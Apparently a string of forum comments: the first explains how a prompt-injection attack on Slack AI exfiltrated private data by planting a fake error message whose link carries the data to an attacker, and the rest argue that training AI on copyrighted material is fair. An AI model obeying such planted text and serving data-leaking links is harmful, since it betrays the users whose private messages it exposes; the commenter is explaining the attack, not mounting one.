The article isn’t that clear, but the attacker cannot get Slack AI to leak private data via prompt injection directly. Instead, they tell it that the answer to a question is a fake error containing a link which contains the private data, and then when a user that can access the private data asks that question they get the fake error and clicking the link (or automatic unfurling?) causes the private data to be sent to the attacker.
Children also learn to reading and writing using copyrighted works, often from borrowed books that they aren’t paying for. Some corporations would love if everyone had to pay individually, maybe per use, to access copyrighted material, and New York Times and American pro sport leagues would love if they could actually own recollections of copyrighted material, but neither of these is good for normal people.
https://www.eff.org/deeplinks/2023/04/how-we-think-about-copyright-and-ai-art-0
OpenAI is right. Almost everything of value on the internet is under copyright, and very little on the internet has clearly and unambiguously specified licensing information. If the software can only be trained on content that clearly allows training, the model isn’t going to “know” anything about anything since Steamboat Willie and it isn’t going to use broken dialects of older English from being limited to only public domain works that have been digitized and made available as public domain (reprints may not be public domain).